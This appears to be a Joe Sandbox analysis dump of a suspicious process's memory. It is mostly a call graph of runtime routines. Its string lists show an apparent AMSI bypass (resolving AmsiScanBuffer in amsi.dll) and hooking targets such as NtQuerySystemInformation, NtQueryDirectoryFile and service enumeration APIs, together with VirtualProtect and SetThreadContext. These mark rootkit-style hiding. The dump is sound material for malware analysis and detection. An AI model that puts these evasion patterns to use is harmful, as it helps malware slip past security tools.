__free_lconv_mon 13 API calls 18301->18302 18304 2527def13fa 18302->18304 18305 2527deedd78 14 API calls 18303->18305 18307 2527def1405 18303->18307 18306 2527deed04c _invalid_parameter_noinfo 38 API calls 18304->18306 18305->18307 18306->18307 18307->18205 18309 2527deed35a 18308->18309 18310 2527deed336 18308->18310 18311 2527deed3bf 18309->18311 18314 2527deed35f 18309->18314 18313 2527deed2a0 __free_lconv_mon 13 API calls 18310->18313 18324 2527deed345 FindFirstFileExW 18310->18324 18312 2527deeec58 MultiByteToWideChar 18311->18312 18322 2527deed3db 18312->18322 18313->18324 18315 2527deed374 18314->18315 18316 2527deed2a0 __free_lconv_mon 13 API calls 18314->18316 18314->18324 18317 2527deec5d0 14 API calls 18315->18317 18316->18315 18317->18324 18318 2527deed3e2 GetLastError 18320 2527deed184 13 API calls 18318->18320 18319 2527deed420 18319->18324 18325 2527deeec58 MultiByteToWideChar 18319->18325 18321 2527deed3ef 18320->18321 18326 2527deed1f4 __free_lconv_mon 13 API calls 18321->18326 18322->18318 18322->18319 18323 2527deed413 18322->18323 18327 2527deed2a0 __free_lconv_mon 13 API calls 18322->18327 18328 2527deec5d0 14 API calls 18323->18328 18324->18222 18324->18226 18329 2527deed47a 18325->18329 18326->18324 18327->18323 18328->18319 18329->18318 18329->18324 18331 2527deed4fa 18330->18331 18332 2527deed4d6 18330->18332 18333 2527deed55f 18331->18333 18336 2527deed500 18331->18336 18334 2527deed2a0 __free_lconv_mon 13 API calls 18332->18334 18343 2527deed4e5 18332->18343 18335 2527deeece8 WideCharToMultiByte 18333->18335 18334->18343 18347 2527deed583 18335->18347 18337 2527deed515 18336->18337 18340 2527deed2a0 __free_lconv_mon 13 API calls 18336->18340 18336->18343 18338 2527deec5d0 14 API calls 18337->18338 18338->18343 18339 2527deed58a GetLastError 18341 2527deed184 13 API calls 18339->18341 18340->18337 18345 2527deed597 18341->18345 18342 2527deed5c7 18342->18343 18344 2527deeece8 WideCharToMultiByte 18342->18344 18343->18226 18350 2527deed629 18344->18350 18351 2527deed1f4 __free_lconv_mon 13 API calls 18345->18351 18346 2527deed5bb 18349 2527deec5d0 14 API calls 18346->18349 18347->18339 18347->18342 18347->18346 18348 2527deed2a0 __free_lconv_mon 13 API calls 18347->18348 18348->18346 18349->18342 18350->18339 18350->18343 18351->18343 18353 2527def0b52 18352->18353 18354 2527deed1f4 __free_lconv_mon 13 API calls 18353->18354 18359 2527def0b67 18353->18359 18355 2527def0b5c 18354->18355 18356 2527deed04c _invalid_parameter_noinfo 38 API calls 18355->18356 18356->18359 18357 2527dee8070 _invalid_parameter_noinfo 8 API calls 18358 2527def0ea8 18357->18358 18358->18236 18359->18357 18361 2527def19f9 18360->18361 18362 2527def1a12 HeapSize 18360->18362 18363 2527deed1f4 __free_lconv_mon 13 API calls 18361->18363 18364 2527def19fe 18363->18364 18365 2527deed04c _invalid_parameter_noinfo 38 API calls 18364->18365 18366 2527def1a09 18365->18366 18366->18294 18368 2527def1a5f 18367->18368 18369 2527def1a55 18367->18369 18371 2527def1a64 18368->18371 18377 2527def1a6b __free_lconv_mon 18368->18377 18370 2527deec5d0 14 API calls 18369->18370 18375 2527def1a5d 18370->18375 18372 2527deed2a0 __free_lconv_mon 13 API calls 18371->18372 18372->18375 18373 2527def1a71 18376 2527deed1f4 __free_lconv_mon 13 API calls 18373->18376 18374 2527def1a9e HeapReAlloc 18374->18375 18374->18377 18375->18298 18376->18375 18377->18373 18377->18374 18378 2527deeb470 __free_lconv_mon 2 API calls 18377->18378 18378->18377 18379 2527dee2e54 18381 2527dee2ea8 18379->18381 18380 2527dee2ec3 18381->18380 18383 2527dee37f4 18381->18383 18384 2527dee388a 18383->18384 18385 2527dee3819 18383->18385 18384->18380 18385->18384 18386 2527dee3f88 StrCmpNIW 18385->18386 18387 2527dee1e08 StrCmpIW StrCmpW 18385->18387 18386->18385 18387->18385 16848 2527deef870 16849 2527deef8a0 16848->16849 16852 2527deef8c7 16848->16852 16850 2527deecb10 __free_lconv_mon 13 API calls 16849->16850 16849->16852 16855 2527deef8b4 16849->16855 16850->16855 16851 2527deef99c 16856 2527deefab3 16851->16856 16858 2527deefa03 16851->16858 16864 2527deef9ca 16851->16864 16852->16851 16871 2527deec558 EnterCriticalSection 16852->16871 16853 2527deef904 16855->16852 16855->16853 16857 2527deef949 16855->16857 16859 2527deefac0 16856->16859 16873 2527deec5ac LeaveCriticalSection 16856->16873 16860 2527deed1f4 __free_lconv_mon 13 API calls 16857->16860 16869 2527deefa61 16858->16869 16872 2527deec5ac LeaveCriticalSection 16858->16872 16863 2527deef94e 16860->16863 16866 2527deed04c _invalid_parameter_noinfo 38 API calls 16863->16866 16864->16858 16867 2527deecab0 _invalid_parameter_noinfo 14 API calls 16864->16867 16865 2527deecab0 14 API calls _invalid_parameter_noinfo 16865->16869 16866->16853 16868 2527deef9f3 16867->16868 16870 2527deecab0 _invalid_parameter_noinfo 14 API calls 16868->16870 16869->16865 16870->16858 17480 2527deef370 VirtualProtect 18397 2527df1d658 18398 2527df1d67d 18397->18398 18403 2527df1d694 18397->18403 18399 2527df1d1f4 __std_exception_copy 13 API calls 18398->18399 18401 2527df1d682 18399->18401 18400 2527df1d724 18404 2527df1bb54 13 API calls 18400->18404 18402 2527df1d04c _invalid_parameter_noinfo 38 API calls 18401->18402 18405 2527df1d68d 18402->18405 18403->18400 18413 2527df1d6da 18403->18413 18415 2527df1d7b6 18403->18415 18430 2527df1d894 18403->18430 18492 2527df1da18 18403->18492 18406 2527df1d77c 18404->18406 18408 2527df1d784 18406->18408 18418 2527df1d7d7 18406->18418 18411 2527df1d2a0 __free_lconv_num 13 API calls 18408->18411 18410 2527df1d836 18412 2527df1d2a0 __free_lconv_num 13 API calls 18410->18412 18414 2527df1d78b 18411->18414 18416 2527df1d841 18412->18416 18417 2527df1d6fd 18413->18417 18422 2527df1d2a0 __free_lconv_num 13 API calls 18413->18422 18414->18417 18423 2527df1d2a0 __free_lconv_num 13 API calls 18414->18423 18415->18417 18421 2527df1d2a0 __free_lconv_num 13 API calls 18415->18421 18420 2527df1d85a 18416->18420 18424 2527df1d2a0 __free_lconv_num 13 API calls 18416->18424 18419 2527df1d2a0 __free_lconv_num 13 API calls 18417->18419 18418->18410 18418->18418 18427 2527df1d87c 18418->18427 18529 2527df20eb8 18418->18529 18419->18405 18425 2527df1d2a0 __free_lconv_num 13 API calls 18420->18425 18421->18415 18422->18413 18423->18414 18424->18416 18425->18405 18428 2527df1d06c _invalid_parameter_noinfo 17 API calls 18427->18428 18429 2527df1d891 18428->18429 18431 2527df1d8c2 18430->18431 18431->18431 18432 2527df1d8de 18431->18432 18433 2527df1d220 __std_exception_copy 13 API calls 18431->18433 18432->18403 18434 2527df1d90d 18433->18434 18435 2527df20eb8 38 API calls 18434->18435 18437 2527df1d926 18434->18437 18435->18437 18436 2527df20eb8 38 API calls 18438 2527df1d943 18436->18438 18437->18436 18439 2527df1d9fc 18437->18439 18438->18439 18441 2527df1d97f 18438->18441 18442 2527df1d962 18438->18442 18443 2527df1d98d 18438->18443 18440 2527df1d06c _invalid_parameter_noinfo 17 API calls 18439->18440 18453 2527df1da17 18440->18453 18444 2527df1d2a0 __free_lconv_num 13 API calls 18441->18444 18446 2527df1d220 __std_exception_copy 13 API calls 18442->18446 18445 2527df1d977 18443->18445 18538 2527df1eee0 18443->18538 18444->18439 18445->18441 18449 2527df1d2a0 __free_lconv_num 13 API calls 18445->18449 18450 2527df1d96d 18446->18450 18448 2527df1da7a 18457 2527df1da8c 18448->18457 18462 2527df1daa1 18448->18462 18449->18441 18451 2527df1d2a0 __free_lconv_num 13 API calls 18450->18451 18451->18445 18452 2527df1d9b5 18454 2527df1d9ba 18452->18454 18455 2527df1d9d0 18452->18455 18453->18448 18547 2527df213d8 18453->18547 18458 2527df1d2a0 __free_lconv_num 13 API calls 18454->18458 18459 2527df1d2a0 __free_lconv_num 13 API calls 18455->18459 18460 2527df1d894 52 API calls 18457->18460 18458->18445 18459->18441 18461 2527df1da9c 18460->18461 18463 2527df18070 _invalid_parameter_noinfo 8 API calls 18461->18463 18464 2527df1dd78 14 API calls 18462->18464 18465 2527df1dd64 18463->18465 18466 2527df1db0b 18464->18466 18465->18403 18467 2527df1db1a 18466->18467 18468 2527df1f198 9 API calls 18466->18468 18556 2527df1d30c 18467->18556 18468->18467 18471 2527df1dba8 18472 2527df1d894 52 API calls 18471->18472 18473 2527df1dbb8 18472->18473 18473->18461 18475 2527df1d2a0 __free_lconv_num 13 API calls 18473->18475 18474 2527df1dd78 14 API calls 18480 2527df1dbd2 18474->18480 18475->18461 18476 2527df1f198 9 API calls 18476->18480 18478 2527df1d894 52 API calls 18478->18480 18479 2527df1dcc8 FindNextFileW 18479->18480 18483 2527df1dce0 18479->18483 18480->18474 18480->18476 18480->18478 18480->18479 18481 2527df1d2a0 13 API calls __free_lconv_num 18480->18481 18482 2527df1dd2a 18480->18482 18578 2527df1d4ac 18480->18578 18481->18480 18484 2527df1dd38 FindClose 18482->18484 18488 2527df1d2a0 __free_lconv_num 13 API calls 18482->18488 18485 2527df1dd0c FindClose 18483->18485 18600 2527df20b20 18483->18600 18484->18461 18489 2527df1dd48 18484->18489 18485->18461 18487 2527df1dd1c 18485->18487 18490 2527df1d2a0 __free_lconv_num 13 API calls 18487->18490 18488->18484 18491 2527df1d2a0 __free_lconv_num 13 API calls 18489->18491 18490->18461 18491->18461 18493 2527df1da58 18492->18493 18494 2527df1da7a 18492->18494 18493->18494 18495 2527df213d8 38 API calls 18493->18495 18496 2527df1da8c 18494->18496 18498 2527df1daa1 18494->18498 18495->18493 18497 2527df1d894 56 API calls 18496->18497 18525 2527df1da9c 18497->18525 18500 2527df1dd78 14 API calls 18498->18500 18499 2527df18070 _invalid_parameter_noinfo 8 API calls 18501 2527df1dd64 18499->18501 18502 2527df1db0b 18500->18502 18501->18403 18503 2527df1db1a 18502->18503 18504 2527df1f198 9 API calls 18502->18504 18505 2527df1d30c 16 API calls 18503->18505 18504->18503 18506 2527df1db7b FindFirstFileExW 18505->18506 18507 2527df1dba8 18506->18507 18516 2527df1dbd2 18506->18516 18508 2527df1d894 56 API calls 18507->18508 18509 2527df1dbb8 18508->18509 18511 2527df1d2a0 __free_lconv_num 13 API calls 18509->18511 18509->18525 18510 2527df1dd78 14 API calls 18510->18516 18511->18525 18512 2527df1f198 9 API calls 18512->18516 18513 2527df1d4ac 16 API calls 18513->18516 18514 2527df1d894 56 API calls 18514->18516 18515 2527df1dcc8 FindNextFileW 18515->18516 18519 2527df1dce0 18515->18519 18516->18510 18516->18512 18516->18513 18516->18514 18516->18515 18517 2527df1d2a0 13 API calls __free_lconv_num 18516->18517 18518 2527df1dd2a 18516->18518 18517->18516 18520 2527df1dd38 FindClose 18518->18520 18524 2527df1d2a0 __free_lconv_num 13 API calls 18518->18524 18521 2527df1dd0c FindClose 18519->18521 18522 2527df20b20 38 API calls 18519->18522 18520->18525 18526 2527df1dd48 18520->18526 18523 2527df1dd1c 18521->18523 18521->18525 18522->18521 18527 2527df1d2a0 __free_lconv_num 13 API calls 18523->18527 18524->18520 18525->18499 18528 2527df1d2a0 __free_lconv_num 13 API calls 18526->18528 18527->18525 18528->18525 18533 2527df20ed5 18529->18533 18530 2527df20eda 18531 2527df20ef0 18530->18531 18532 2527df1d1f4 __std_exception_copy 13 API calls 18530->18532 18531->18418 18534 2527df20ee4 18532->18534 18533->18530 18533->18531 18536 2527df20f24 18533->18536 18535 2527df1d04c _invalid_parameter_noinfo 38 API calls 18534->18535 18535->18531 18536->18531 18537 2527df1d1f4 __std_exception_copy 13 API calls 18536->18537 18537->18534 18539 2527df1ef02 18538->18539 18540 2527df1ef1f 18538->18540 18539->18540 18541 2527df1ef10 18539->18541 18542 2527df1ef29 18540->18542 18608 2527df219f0 18540->18608 18543 2527df1d1f4 __std_exception_copy 13 API calls 18541->18543 18615 2527df21a40 18542->18615 18546 2527df1ef15 18543->18546 18546->18452 18548 2527df213e0 18547->18548 18549 2527df213f5 18548->18549 18550 2527df2140e 18548->18550 18551 2527df1d1f4 __std_exception_copy 13 API calls 18549->18551 18554 2527df1dd78 14 API calls 18550->18554 18555 2527df21405 18550->18555 18552 2527df213fa 18551->18552 18553 2527df1d04c _invalid_parameter_noinfo 38 API calls 18552->18553 18553->18555 18554->18555 18555->18453 18557 2527df1d336 18556->18557 18558 2527df1d35a 18556->18558 18561 2527df1d2a0 __free_lconv_num 13 API calls 18557->18561 18573 2527df1d345 FindFirstFileExW 18557->18573 18559 2527df1d3bf 18558->18559 18560 2527df1d35f 18558->18560 18562 2527df1ec58 MultiByteToWideChar 18559->18562 18563 2527df1d374 18560->18563 18565 2527df1d2a0 __free_lconv_num 13 API calls 18560->18565 18560->18573 18561->18573 18572 2527df1d3db 18562->18572 18566 2527df1c5d0 14 API calls 18563->18566 18564 2527df1d3e2 GetLastError 18567 2527df1d184 13 API calls 18564->18567 18565->18563 18566->18573 18570 2527df1d3ef 18567->18570 18568 2527df1d420 18569 2527df1ec58 MultiByteToWideChar 18568->18569 18568->18573 18574 2527df1d47a 18569->18574 18575 2527df1d1f4 __std_exception_copy 13 API calls 18570->18575 18571 2527df1d413 18577 2527df1c5d0 14 API calls 18571->18577 18572->18564 18572->18568 18572->18571 18576 2527df1d2a0 __free_lconv_num 13 API calls 18572->18576 18573->18471 18573->18480 18574->18564 18574->18573 18575->18573 18576->18571 18577->18568 18579 2527df1d4d6 18578->18579 18580 2527df1d4fa 18578->18580 18583 2527df1d2a0 __free_lconv_num 13 API calls 18579->18583 18587 2527df1d4e5 18579->18587 18581 2527df1d500 18580->18581 18582 2527df1d55f 18580->18582 18585 2527df1d515 18581->18585 18581->18587 18588 2527df1d2a0 __free_lconv_num 13 API calls 18581->18588 18584 2527df1ece8 WideCharToMultiByte 18582->18584 18583->18587 18594 2527df1d583 18584->18594 18589 2527df1c5d0 14 API calls 18585->18589 18586 2527df1d58a GetLastError 18590 2527df1d184 13 API calls 18586->18590 18587->18480 18588->18585 18589->18587 18593 2527df1d597 18590->18593 18591 2527df1d5c7 18591->18587 18592 2527df1ece8 WideCharToMultiByte 18591->18592 18596 2527df1d629 18592->18596 18597 2527df1d1f4 __std_exception_copy 13 API calls 18593->18597 18594->18586 18594->18591 18595 2527df1d5bb 18594->18595 18598 2527df1d2a0 __free_lconv_num 13 API calls 18594->18598 18599 2527df1c5d0 14 API calls 18595->18599 18596->18586 18596->18587 18597->18587 18598->18595 18599->18591 18601 2527df20b52 18600->18601 18602 2527df1d1f4 __std_exception_copy 13 API calls 18601->18602 18607 2527df20b67 18601->18607 18603 2527df20b5c 18602->18603 18604 2527df1d04c _invalid_parameter_noinfo 38 API calls 18603->18604 18604->18607 18605 2527df18070 _invalid_parameter_noinfo 8 API calls 18606 2527df20ea8 18605->18606 18606->18485 18607->18605 18609 2527df21a12 HeapSize 18608->18609 18610 2527df219f9 18608->18610 18611 2527df1d1f4 __std_exception_copy 13 API calls 18610->18611 18612 2527df219fe 18611->18612 18613 2527df1d04c _invalid_parameter_noinfo 38 API calls 18612->18613 18614 2527df21a09 18613->18614 18614->18542 18616 2527df21a55 18615->18616 18617 2527df21a5f 18615->18617 18618 2527df1c5d0 14 API calls 18616->18618 18619 2527df21a64 18617->18619 18625 2527df21a6b __std_exception_copy 18617->18625 18623 2527df21a5d 18618->18623 18620 2527df1d2a0 __free_lconv_num 13 API calls 18619->18620 18620->18623 18621 2527df21a71 18624 2527df1d1f4 __std_exception_copy 13 API calls 18621->18624 18622 2527df21a9e HeapReAlloc 18622->18623 18622->18625 18623->18546 18624->18623 18625->18621 18625->18622 18626 2527df1b470 __std_exception_copy 2 API calls 18625->18626 18626->18625 16879 2527deef440 GetProcessHeap 17497 2527deeff40 17498 2527deeff4b 17497->17498 17506 2527def2c24 17498->17506 17519 2527deec558 EnterCriticalSection 17506->17519 14946 2527dee1e3c LoadLibraryA GetProcAddress 14947 2527dee1e6f 14946->14947 14948 2527dee1e62 SleepEx 14946->14948 14948->14948 16458 2527deebd34 16459 2527deebd4d 16458->16459 16460 2527deebd49 16458->16460 16461 2527deee864 56 API calls 16459->16461 16462 2527deebd52 16461->16462 16473 2527deeedc8 GetEnvironmentStringsW 16462->16473 16465 2527deebd5f 16467 2527deed2a0 __free_lconv_mon 13 API calls 16465->16467 16466 2527deebd6b 16493 2527deebda8 16466->16493 16467->16460 16470 2527deed2a0 __free_lconv_mon 13 API calls 16471 2527deebd92 16470->16471 16472 2527deed2a0 __free_lconv_mon 13 API calls 16471->16472 16472->16460 16474 2527deebd57 16473->16474 16475 2527deeedf8 16473->16475 16474->16465 16474->16466 16476 2527deeece8 WideCharToMultiByte 16475->16476 16477 2527deeee49 16476->16477 16478 2527deeee53 FreeEnvironmentStringsW 16477->16478 16479 2527deec5d0 14 API calls 16477->16479 16478->16474 16480 2527deeee63 16479->16480 16481 2527deeee6b 16480->16481 16482 2527deeee74 16480->16482 16483 2527deed2a0 __free_lconv_mon 13 API calls 16481->16483 16484 2527deeece8 WideCharToMultiByte 16482->16484 16485 2527deeee72 16483->16485 16486 2527deeee97 16484->16486 16485->16478 16487 2527deeee9b 16486->16487 16488 2527deeeea5 16486->16488 16489 2527deed2a0 __free_lconv_mon 13 API calls 16487->16489 16490 2527deed2a0 __free_lconv_mon 13 API calls 16488->16490 16491 2527deeeea3 FreeEnvironmentStringsW 16489->16491 16490->16491 16491->16474 16494 2527deebdcd 16493->16494 16495 2527deed220 __free_lconv_mon 13 API calls 16494->16495 16505 2527deebe03 16495->16505 16496 2527deed2a0 __free_lconv_mon 13 API calls 16498 2527deebd73 16496->16498 16497 2527deebe6d 16499 2527deed2a0 __free_lconv_mon 13 API calls 16497->16499 16498->16470 16499->16498 16500 2527deed220 __free_lconv_mon 13 API calls 16500->16505 16501 2527deebe92 16502 2527deebebc 13 API calls 16501->16502 16504 2527deebe9a 16502->16504 16506 2527deed2a0 __free_lconv_mon 13 API calls 16504->16506 16505->16497 16505->16500 16505->16501 16507 2527deebea6 16505->16507 16508 2527deebe0b 16505->16508 16510 2527deed2a0 __free_lconv_mon 13 API calls 16505->16510 16512 2527deec328 16505->16512 16506->16508 16509 2527deed06c _invalid_parameter_noinfo 17 API calls 16507->16509 16508->16496 16511 2527deebeb9 16509->16511 16510->16505 16513 2527deec33f 16512->16513 16514 2527deec335 16512->16514 16515 2527deed1f4 __free_lconv_mon 13 API calls 16513->16515 16514->16513 16518 2527deec35a 16514->16518 16520 2527deec346 16515->16520 16516 2527deed04c _invalid_parameter_noinfo 38 API calls 16517 2527deec352 16516->16517 16517->16505 16518->16517 16519 2527deed1f4 __free_lconv_mon 13 API calls 16518->16519 16519->16520 16520->16516 16589 2527def494f 16590 2527def495e 16589->16590 16591 2527def4968 16589->16591 16593 2527deec5ac LeaveCriticalSection 16590->16593 18653 2527dee824c 18655 2527dee8270 __scrt_release_startup_lock 18653->18655 18654 2527deeb581 18655->18654 18656 2527deecb10 __free_lconv_mon 13 API calls 18655->18656 18657 2527deeb5aa 18656->18657 16594 2527deead48 16595 2527dee9324 __CxxCallCatchBlock 9 API calls 16594->16595 16596 2527deead7d 16595->16596 16597 2527dee9324 __CxxCallCatchBlock 9 API calls 16596->16597 16598 2527deead8b __except_validate_context_record 16597->16598 16599 2527dee9324 __CxxCallCatchBlock 9 API calls 16598->16599 16600 2527deeadcf 16599->16600 16601 2527dee9324 __CxxCallCatchBlock 9 API calls 16600->16601 16602 2527deeadd8 16601->16602 16603 2527dee9324 __CxxCallCatchBlock 9 API calls 16602->16603 16604 2527deeade1 16603->16604 16617 2527dee993c 16604->16617 16607 2527dee9324 __CxxCallCatchBlock 9 API calls 16608 2527deeae11 __CxxCallCatchBlock 16607->16608 16624 2527dee9978 16608->16624 16610 2527deeaeeb __CxxCallCatchBlock 16611 2527dee9324 __CxxCallCatchBlock 9 API calls 16610->16611 16612 2527deeaefe 16611->16612 16614 2527dee9324 __CxxCallCatchBlock 9 API calls 16612->16614 16616 2527deeaf07 16614->16616 16618 2527dee9324 __CxxCallCatchBlock 9 API calls 16617->16618 16619 2527dee994d 16618->16619 16620 2527dee9958 16619->16620 16621 2527dee9324 __CxxCallCatchBlock 9 API calls 16619->16621 16622 2527dee9324 __CxxCallCatchBlock 9 API calls 16620->16622 16621->16620 16623 2527dee9969 16622->16623 16623->16607 16623->16608 16625 2527dee9324 __CxxCallCatchBlock 9 API calls 16624->16625 16626 2527dee998a 16625->16626 16627 2527dee99c5 16626->16627 16628 2527dee9324 __CxxCallCatchBlock 9 API calls 16626->16628 16629 2527dee9995 16628->16629 16629->16627 16630 2527dee9324 __CxxCallCatchBlock 9 API calls 16629->16630 16631 2527dee99b6 16630->16631 16631->16610 16632 2527dee8ff8 16631->16632 16633 2527dee9324 __CxxCallCatchBlock 9 API calls 16632->16633 16634 2527dee9006 16633->16634 16634->16610 16899 2527def4848 16902 2527dee904c 16899->16902 16903 2527dee9076 16902->16903 16904 2527dee9064 16902->16904 16906 2527dee9324 __CxxCallCatchBlock 9 API calls 16903->16906 16904->16903 16905 2527dee906c 16904->16905 16907 2527dee9074 16905->16907 16909 2527dee9324 __CxxCallCatchBlock 9 API calls 16905->16909 16908 2527dee907b 16906->16908 16908->16907 16911 2527dee9324 __CxxCallCatchBlock 9 API calls 16908->16911 16910 2527dee909b 16909->16910 16912 2527dee9324 __CxxCallCatchBlock 9 API calls 16910->16912 16911->16907 16913 2527dee90a8 16912->16913 16914 2527deec2f4 14 API calls 16913->16914 16915 2527dee90b1 16914->16915 16916 2527deec2f4 14 API calls 16915->16916 16917 2527dee90bd 16916->16917 18658 2527df11e3c LoadLibraryA GetProcAddress 18659 2527df11e62 Sleep 18658->18659 18660 2527df11e6f 18658->18660 18659->18659 18661 2527deeae42 18662 2527dee9324 __CxxCallCatchBlock 9 API calls 18661->18662 18664 2527deeae4f __CxxCallCatchBlock 18662->18664 18663 2527deeae93 RaiseException 18665 2527deeaeba 18663->18665 18664->18663 18666 2527dee9978 __CxxCallCatchBlock 9 API calls 18665->18666 18670 2527deeaec2 18666->18670 18667 2527deeaeeb __CxxCallCatchBlock 18668 2527dee9324 __CxxCallCatchBlock 9 API calls 18667->18668 18669 2527deeaefe 18668->18669 18671 2527dee9324 __CxxCallCatchBlock 9 API calls 18669->18671 18670->18667 18672 2527dee8ff8 __CxxCallCatchBlock 9 API calls 18670->18672 18673 2527deeaf07 18671->18673 18672->18667 17543 2527dee4320 17546 2527dee426d 17543->17546 17544 2527dee42d7 17545 2527dee42bd VirtualQuery 17545->17544 17545->17546 17546->17544 17546->17545 17547 2527dee4322 GetLastError 17546->17547 17547->17546 16919 2527deef820 16922 2527deef7d8 16919->16922 16927 2527deec558 EnterCriticalSection 16922->16927 18674 2527deefe20 18675 2527deefe4a 18674->18675 18676 2527deed220 __free_lconv_mon 13 API calls 18675->18676 18677 2527deefe6a 18676->18677 18678 2527deed2a0 __free_lconv_mon 13 API calls 18677->18678 18679 2527deefe78 18678->18679 18680 2527deefea2 18679->18680 18682 2527deed220 __free_lconv_mon 13 API calls 18679->18682 18681 2527deefec1 InitializeCriticalSectionEx 18680->18681 18684 2527deefeab 18680->18684 18681->18680 18683 2527deefe94 18682->18683 18685 2527deed2a0 __free_lconv_mon 13 API calls 18683->18685 18685->18680 16635 2527dee2518 GetProcessIdOfThread GetCurrentProcessId 16636 2527dee25be 16635->16636 16637 2527dee2543 CreateFileW 16635->16637 16637->16636 16638 2527dee2577 WriteFile ReadFile CloseHandle 16637->16638 16638->16636 18686 2527deec218 18687 2527deed2a0 __free_lconv_mon 13 API calls 18686->18687 18688 2527deec228 18687->18688 18689 2527deed2a0 __free_lconv_mon 13 API calls 18688->18689 18690 2527deec23c 18689->18690 18691 2527deed2a0 __free_lconv_mon 13 API calls 18690->18691 18692 2527deec250 18691->18692 18693 2527deed2a0 __free_lconv_mon 13 API calls 18692->18693 18694 2527deec264 18693->18694 17001 2527dee6430 17002 2527dee643d 17001->17002 17003 2527dee6449 17002->17003 17008 2527dee655a 17002->17008 17004 2527dee64cd 17003->17004 17005 2527dee64a6 SetThreadContext 17003->17005 17005->17004 17006 2527dee6581 VirtualProtect FlushInstructionCache 17006->17008 17007 2527dee663e 17009 2527dee665e 17007->17009 17017 2527dee4b20 17007->17017 17008->17006 17008->17007 17021 2527dee5530 GetCurrentProcess 17009->17021 17012 2527dee66b7 17015 2527dee8070 _invalid_parameter_noinfo 8 API calls 17012->17015 17013 2527dee6677 ResumeThread 17014 2527dee6663 17013->17014 17014->17012 17014->17013 17016 2527dee66ff 17015->17016 17019 2527dee4b3c 17017->17019 17018 2527dee4b9f 17018->17009 17019->17018 17020 2527dee4b52 VirtualFree 17019->17020 17020->17019 17024 2527dee554c 17021->17024 17022 2527dee5562 VirtualProtect FlushInstructionCache 17022->17024 17023 2527dee5593 17023->17014 17024->17022 17024->17023 17025 2527deeec30 GetCommandLineA GetCommandLineW 17026 2527deec828 17027 2527deec82d 17026->17027 17028 2527deec842 17026->17028 17032 2527deec848 17027->17032 17033 2527deec88a 17032->17033 17034 2527deec892 17032->17034 17035 2527deed2a0 __free_lconv_mon 13 API calls 17033->17035 17036 2527deed2a0 __free_lconv_mon 13 API calls 17034->17036 17035->17034 17037 2527deec89f 17036->17037 17038 2527deed2a0 __free_lconv_mon 13 API calls 17037->17038 17039 2527deec8ac 17038->17039 17040 2527deed2a0 __free_lconv_mon 13 API calls 17039->17040 17041 2527deec8b9 17040->17041 17042 2527deed2a0 __free_lconv_mon 13 API calls 17041->17042 17043 2527deec8c6 17042->17043 17044 2527deed2a0 __free_lconv_mon 13 API calls 17043->17044 17045 2527deec8d3 17044->17045 17046 2527deed2a0 __free_lconv_mon 13 API calls 17045->17046 17047 2527deec8e0 17046->17047 17048 2527deed2a0 __free_lconv_mon 13 API calls 17047->17048 17049 2527deec8ed 17048->17049 17050 2527deed2a0 __free_lconv_mon 13 API calls 17049->17050 17051 2527deec8fd 17050->17051 17052 2527deed2a0 __free_lconv_mon 13 API calls 17051->17052 17053 2527deec90d 17052->17053 17058 2527deec6f8 17053->17058 17072 2527deec558 EnterCriticalSection 17058->17072

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 200d946d725ee9b98254b8358bca941e67ba4a8d85ed93542f15d48ee567d6e6
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 1FD06710611E00D7FA8AEB11EC9C758A262EBAFB43FD54455C50A012E4DE3C8A9DC358

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 6c004f37e9f1c915376b53e3f421fb428432a4bcb26b9ce800ca2081cd5688aa
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: E6519CA0100E4AE6FB42DF64EC8C7D8A321E79F746FD08916D419431E5EE78C29EC399

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000002527DEE3A35
